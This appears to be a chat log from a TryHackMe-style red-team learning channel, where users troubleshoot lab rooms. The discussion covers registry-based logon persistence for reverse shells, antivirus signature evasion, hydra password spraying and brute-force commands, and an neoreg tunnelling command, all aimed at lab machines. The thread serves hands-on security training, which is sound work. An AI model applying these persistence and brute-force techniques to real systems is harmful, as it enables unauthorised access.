For the last flag I got this error, do you have any idea?

1. I didn't clearly get the first message. Do you wanna say that some commands are specific to psexec only right? So how can you do the same exact work without psexec?

2. Same problem happened with me because if you tried the same payload exe for getting flag13 then flag12 payload will connect before the payload for getting flag13 so try to change the port no or remove the payload exe entry in userinit so that only payload for flag13 will connect back to you!

3. This is non interactive shell. It is clearly saying you have connected with the victim just type the command. You will get the command output.

According to windows local persistence room

There is only one major use of psexec to simple get SYSTEM account access to edit registries!

There is also alternative ways to done this task. Sometimes in real world you can get the reverse shell with the SYSTEM account after exploiting some type of vulnerabilities or you can also migrate to SYSTEM account process. After that simply use reg command to done the same task on terminal rather than on GUI

Ah, I understand. And is psexec a forbbiden software by antivirus?

2. Oh, I changed the payload, but I think I used the same location as the previous example. You should be right! I had this in mind, but did not modifing correctly.
3. I think I tried input commands and did not work.
   I will try again later and I will let you know. Thanks for the help!

Gave +1 Rep to @gilded edge

Nope, It's not a malicious program.
it's windows utility
https://learn.microsoft.com/en-us/sysinternals/downloads/psexec

But is not installed by default on Windows, right?

yes
it is not given by default

Check about sysinternal tools

https://learn.microsoft.com/en-us/sysinternals/

You can tag me anytime, if you have any question!

So will be also a way, if I am Admim, to install this tool in order to access the registry with high privileges faster. But then I have to be careful to remove this tool and the logs that I made with it. In a red team scrnario will be complicated, but for a regular pentest should be good I think

Yup, But majority of the time. You can find these sysinternal tools on the system in larger environment
these tools helps sysadmin to manage many things
one of the tool is sysmon tool https://tryhackme.com/room/sysmon to monitor and log events of windows system

You don't need to install it. You can simply transfer portable exe to the victim in order to use it.

https://learn.microsoft.com/en-us/sysinternals/downloads/

You can download this tool suite in your machine to explore it more

one of the website for sysinternals is a phishing page so don't go there

they simply replace l with i

Oh, cool

What do you mean?😅 where is this page?

⚠️ This is phishing website so be careful before downloading from a google search!
Means there tools might be malicious

Here is the official microsoft link to download
https://learn.microsoft.com/en-us/sysinternals/downloads/

Ok, thank you for the information!😊

Gave +1 Rep to @gilded edge

Hello, I am trying to do just the Logon Script part for the flag13.exe but I can not get any session

Share me the details please

I tried also the 3rd problem and the flag is not working:

Can we talk about this one first? 😄 Because I am already in this enviorement

I mean this one

But you get the shell right?

Yes the shell is working

Wait

You are on powershell

Try ./flag17

.exe

Yes, is working now 🎉

Ok good

And the other one, I set the UserInitMprLogonScript variable with the revshell.exe as Data parameter

seriously

someone deletet Flag.exe from toby.beck?

Everything looks Ok

Check is revshell.exe is on that path

Second check listening port and payload set port

Third thing HKCU change only apply to the current user
Try HKLM environment change

And remember after signing out and again login you will get the shell after few seconds not fast as the previous flag12 registry

All should be good set. I will try HKLM

I think that this is not aplicable in HKLM and I have to set it for all users in HKCU

I got it now. The problem was that I was opening the regedit from psexec instead of opening from the start menu. So, I think I edited the variable for a system user

Thanks again!

Exactly you are right

I need help in task 2 signature evasion pls

sth wrong with this neo-reGeorg?

wtf is wrong with this netplan in attackerbox?!

Where is procexp on Windows Internals

?

Tryhackme - Signature Evasion - Task 3 + hint for task 2 search In Youtube And See the Video to got the anwer

in Weaponization, did anyone have trouble with the user emulation app? It looks like port 8080 isn't open

Terminated the machine and re-started it to fix.

when you split the payload and reach dead line where you don't know where to go
round the payload size to the first thousand e.g 33930370 round it to 33931000

or just automate the splitting process and round the result bytes
using tool described in the next task

Hello I cannot run dll-injector.exe

task Abusing Windows Internals, 5

I'm in the Passwords Attacks section , task number 8. And i need to create some custom JTR rules. I have edited the /etc/john/john.conf , but it tells me i do not have any custom rules

your own vm or the attackbox???

own VM. Im trying to upload a screenshot 🙂

!docs verify

@obsidian sundial ⬆️ follow the instructions in this link to verify to be able to post screenshots

OK , ill try like this

john --wordlist=clinic.lst --rules=THMPW --stdout
Using default input encoding: UTF-8
No "THMPW" mode rules found in /etc/john/john.conf

so this is the error on my own VM

and this is my john.conf

tail -f 10 /etc/john/john.conf
tail: cannot open '10' for reading: No such file or directory
==> /etc/john/john.conf <==

include john-local.conf in local dir, it can override john.conf, john-local.conf (or any other conf file loaded)

This is disabled by default since it's a security risk in case JtR is ever run with untrusted current directory

#.include './john-local.conf'

End of john.conf file.

Keep this comment, and blank line above it, to make sure a john-local.conf

that does not end with \n is properly loaded.

[List.Rules:THMPW]
[!@]Az"[0-9][0-9]"

Probably it's not getting loaded due to putting it at the very end of the file.
You might want to add your rule somewhere near the other rules in the .conf file

I tried ( elcocohtb is my other account ) indeed , but that does not give any other effect

for sure i made a mistake somewhere , but i dont seem to find where

Stuck on Task 9 of Room Password Attacks.

Here's the steps I've followed:

1. Used the given usernames in the example usernames-list.txt.

2. Generated a pass1.lst with "Spring Summer Fall Winter". Expanded it using the rule THM-Pass Az"[2][0][2][0-3]" ^[!@] based on the question hint. Command used was: john --wordlist=pass1.lst --rules=THM-Pass --stdout > pass2.lst.

3. Attempted password spraying attack using: hydra -L usernames-list.txt -P pass2.lst ssh://10.10.147.70 -t 4. And following is the output:

What am I doing wrong? Should I change the rule somehow to get a hit?

Never mind, found the issue. The rule should of been Az"[2][0][2][0-3]" $[!@] which appends the special character at the end instead of at the beginning. Got the password. :)

set the wrong Password and user name parameteres

capture through burpsuite or firefox > inspect > network tab > and find out bro easy

Hello, I am doing Data Exfiltration room and at ICMP part I do not get any messages through nping. These are my options:

void the metasploit brother good framwork for pentisting but its ok

Intro to C2 Task 5, not sure aboute how to portforward. the 192.x.x.x should be replaced by what IP? I'm using the attack box.

Hi! I have a conceptual doubt about the difference between the LDAP autentication and the NetNTLM autentication, especifically with the fact that the user actually logs in the DC with LDAP and it doesn't with NetNTLM, instead, is the aplication who logs for him.

My doubt is: if the user don't get log into the DC with NetNTLM where he gets log and what is exactly the meaning of "the application logs on his behalf" the application have various credentials for each user or something of the kind? Thanks!

Is there any bug on that Task OSPEC Task 7? I tried all possile combination

it needs 4 different combinations one after the other

so if you tried all of the ones for the first one you probably on the second one now

Does not seem to work. I do not know if it is me or the box. :/

are you okay with if shadow dm:s you the numbers??? as well this is probably not teaching you anything and is mostly brute forcing the numbers anyways

oh wait no shadow sees your error

you must have spaces between all the numbers for some reasons

yes the spaces are mandatory

ohhh thankyou

will wait a bit.... you send shadow a direct message if you need help instead of doing it yourself

Hey, not sure I follow all of your question, but if you are talking about logging to the LDAP service of an Active Directory Server, LDAP uses SASL for authentication, which is simply a middle layer that ends up connecting to the actual authentication providers. In the end, SASL will usually have kerberos and NTLM as auth providers, which means that when you log into LDAP, you are probably using kerberos (or NTLM ) anyway

Thank you very much! I got it!

Gave +1 Rep to @royal void

nice and congratz

Room: Windows Local Persistence
Task: 2
Issue: Following the instructions in task 2, I used evil-winrm to download sam.bak and system.bak to my local machine. However they don't show up anywhere (especially not in the mentioned location). Anyone know what's going on?

I even tried specifying a file path after, but still the same.

Tried using find? E.g find / -type f -name *system.bak 2>/dev/null

In data exfiltration room we exfiltrate data through DNS protocol and THM provide us a web interface to make this step easy. I am curious how are these made in real life?

Thanks!

Gave +1 Rep to @echo ore

Hey can someone explain why in red team engagement Task 7 we have

and the answer to the question "When will the engagement end? (MM/DD/YYYY)" is actually 14/11/2021 ??

is engagement dates the day both parts approved it ?

Try to refresh the page

And you have to look at Execution Dates

There you will find the last date

After refreshing i still have same dates

thats what i did

but what does this line means so ?

Post exploitation are the steps after the exploit has been done

Like cleaning the footprints, making backdoors. So as you can see that one is the last date registered

mh ok it is just a step in the whole process

For some reason it simply didn't get downloaded to my local machine. Completed the task using the AttackBox. Thanks for this though.

Gave +1 Rep to @native berry

hello

which tool can i use to get hidden secrets from clear text

Hello, can you give more details?

I'm on Task 6 in the Data Exfiltration room. I'm trying to run the "python3 neoreg.py -k thm -u http://10.10.x.x/uploader/files/tunnel.php" command, but it gives me an error - "Georg is not ready, please check URL and KEY." I've confirmed the tunnel.php file has been uploaded. Not sure how to proceed.

I've even tried to use "-k admin" as the key, and that didn't work either.

Ah - I think I got it ... I had to also regenerate all of the template files using the correct key as well

is Evading Logging and Monitoring bugged?

in the forum they everyone says task 10doesn't work

i've tried with the walkthrough but nothing

can anyone help me?

Yeah everyone is having issues with task 10

Having trouble with the last flag of local windows persistence, the MSSQL one, the web application simply does nothing when clicking the button, so no data is inserted and the trigger isn't called. Has this happened to anyone?

Solved it meanwhile ?

Yes, terminating the instance and starting a new one fixed it, don't know what got it stuck

hey everyone i am having trouble accesing the AV Shell code evasion module the win machine says password expired

anyone else having this issue?

Staff is already aware of it, hopefully it will be fixed soon

Oh okay thank you!!

Hey good people im in room Signature Evasion Task 5 and it asks me to check the "shell.exe" file in cyberchef yet the machine dont have internat connection how am i supposed to upload the file to the site ?

How can i do that ? i tried connect to SMBbut it asks for ROOT password

is there something wrong for this Win-Local-Persistence task6 last flag

https://tryhackme.com/room/windowslocalpersistence

it ain't returning any rev shell

went through this room and all my notes everything is required SSH or NC which i do not have

Will do, thank you !

Gave +1 Rep to @weak ice

looks like flag13 is broken

Was working fine for me, what's the issue ?

after i sign out and rdp it again, i never got the shell.Tried it like 4 times even on the attack box

Why would you have to rdp again ?

You just sign out and back in iirc ?

oh sorry here's what they say "After doing this, sign out of your current session and log in again". So i sign out but i didn't find to sign in again so i just rdp again

when i sign out, i lose my rdp session. So i have to RDP it again

Do you sign out like that ?

ya i did

i even tried from web browser too and after signingOut, there's an option to reconnect but got the same probs

i did the same for the other 2 flags and they work

Have you restarted the target machine already ?

ya...

Can I rdp to your machine to see myself ?

sure

So to the target machine, not your own 😄

Just to be clear

k

Would need the IP then 🙂

can i DM u?

Ye

I feel like an idiot it didnt manage to transfer the file can i dm you for help ?

I understand i just dont manage to get what to do i cant download any tool in that machine and half of the stuff i try to move there using linux server get deleted with Defender ver frustrating

Thank you lassi i will try

Gave +1 Rep to @weak ice

I DID IT !!!

hey guys anyone having issues with adding the dns to breachingad box ?

i tried it on several Oses and can't ping the website requested or can't even ping the DC

Do you use the special breaching vpn config?

yeah

Yes

Hello ,
I keep getting an error when trying to exploit windows machine on Intro to C2
Exploit aborted due to failure: not-vulnerable: Set ForceExploit to override

this is the config

im on kali browser machine

Are you on the Attackbox or the Kali webbox?

Kali

That's outdated, you should use the attackbox instead.

ok ,trying with attackbox

In this which Domain will contain the forest DC (the DC with Enterprise Admins group)

What should be configured between two domains for a user in Domain A to access a resource in Domain B?
A one way trust between two domains "B trusts A" would work. But this is not the answer to complete the lab someone help me

Hey guys, I'm doing Windows Privilege Escalation module in this path and I see this ^

Any idea what LOCAL represents in this command and why it is necessary?

I think it's used to tell the script to use the files you have locally, rather than to dump it from a remote machine

Hello people. In https://tryhackme.com/room/windowslocalpersistence, Task 6, I implemented all steps to obtain flag 13, but I receive an error even after repeating all steps. Is there something I'm missing?

Screenshot of the registry editor ?

@native berry there u go

Did you undo the registry settings for the previous task thats for flag 12?
Or used a different port for your rev shell then for the previous task?

I deleted the old shell (to obtain flag 12), and generated a new reverse shell with different ports, but did not revert the registry settings to obtain flag 12.

Ok, well if you are sure about that the rev shell you catched is not the one from the previous section, then I don't see anything wrong there.

Might restarting the machine and redoing it fixes it

let me try

@native berry turns out re-instantiating the VM worked. Thanks.

What I wonder is how the other registry settings could have affected getting flag 13, coz ideally they are supposed to be isolated, no?

Gave +1 Rep to @native berry

or it could have been my mistake all along somehow? 🤔

Dunno what the reason was 😄

anyway, thanks again

signature evasion task 2
To the nearest kibibyte, what is the first detected byte?
i splitted the shell.exe and got to the point whjere its not detecting anymore but the vlaue i put 50xxx is not the answer anyone can nudge on that???

whats a kibibyte exactly and whats the format

NVM got it

Am I the only one to get this error? Can somebody help me fix this?

Tried commenting the line that has quoting_detection_proc() function, but that didn't work either

Tried this from the attackbox and it looks to work but there's an authorization issue.

Any help would be appreciated!

Include the room and the task you are doing pls

Oh sorry, forgot to mention

Room: Windows Local Persistence
Task: 2

Link: https://tryhackme.com/room/windowslocalpersistence

Show a screenshot of net localgroup run in cmd on the target machine pls

Ah no sry, run net user thmuser1 pls

Sure

There you go

Okay, now the tool looks to function properly. Just re-ran the command and it worked.

But this works on attack-box and not in my machine

I still get this error in my machine

Screenshot of your openvpn output when connecting to the VPN as well as a screen of ip a ?

Sure, give me a min

Can I try to connect to your target machine via that command myself ?

I am able to connect to the target from attack-box now

But looks like it's an evil-winrm issue

That's why I am unable to hit the target machine from my personal machine

I know, but I thought you want to be able to connect from your machine?
If you are good with doing it from the attackbox, I'll leave it with that

Not really. I want to connect from my machine

You can check from your end, no issues

Seems to work fine for me, I'm on evil-winrm v 3.4

What's your openssl version?

Not sure if it's from there, or from your openssl version or even from the vpn

I doubt the openssl version. I'm on 1.1

1.1 too

Oh

Evading Logging and Monitoring task 10 the binary is stuck any help

Do I have to be on the vpn to access this url https://clinic.thmredteam.com/

It's not loading

Yeah it turns out that I have to be on the vpn

Is there anything missing in my command as I'm waiting forever never hitting the right password hydra -l burgess -P clinic.lst 10.10.102.122 http-post-form "/login-post:username=^USER^&password=^PASS^:S=logout.php" -V -I -T 64 -f I modified the clinic.lst with the Single-Extra john rule. Password Attacks room Task 8

I also tried with :F=Invalid username or password.

hey guys im doing breaching AD room iv got to the part of bruteforce ntlm with the python script ,but when i tried to brute force ntlm with hydra i couldnt figure out how to do it can anyone help me

Hydra is for online password cracking, like SSH and HTTP. If you have an NTLM hash you want to crack you need either john or hashcat

having an issue with the weaponisation - Windows Scripting Host. Keep getting "cannot find script file error". Paths are correct (im in the same folder) and ive simplified the payload just a pop up incase it was an issue there. Also tried resetting attack box. Still getting it. Anyone had this before?

Can you show exactly what command you're running if you haven't fixed the issue yet?

ive put it in as a bug. i can get the command to run on a windows vm but not the attack box. may be some thm issue.

Could be, I remember running into some sort of problem myself with that same step but I can't remember how I fixed it

In the room https://tryhackme.com/room/winadbasics, there is question in trusts section

What should be configured between two domains for a user in Domain A to access a resource in Domain B?
I know that it should be B trusts A but the THM is not accepting answer. Please help someone

Trust Relationships

Having multiple domains organised in trees and forest allows you to have a nice compartmentalised network in terms of management and resources. But at a certain point, a user at THM UK might need to access a shared file in one of MHT ASIA servers. For this to happen, domains arranged in trees and forests are joined together by trust relationships.
see title of this section and think a tiny bit more

Lol that was quick and trivial. Thanks for support

Gave +1 Rep to @royal void

no problem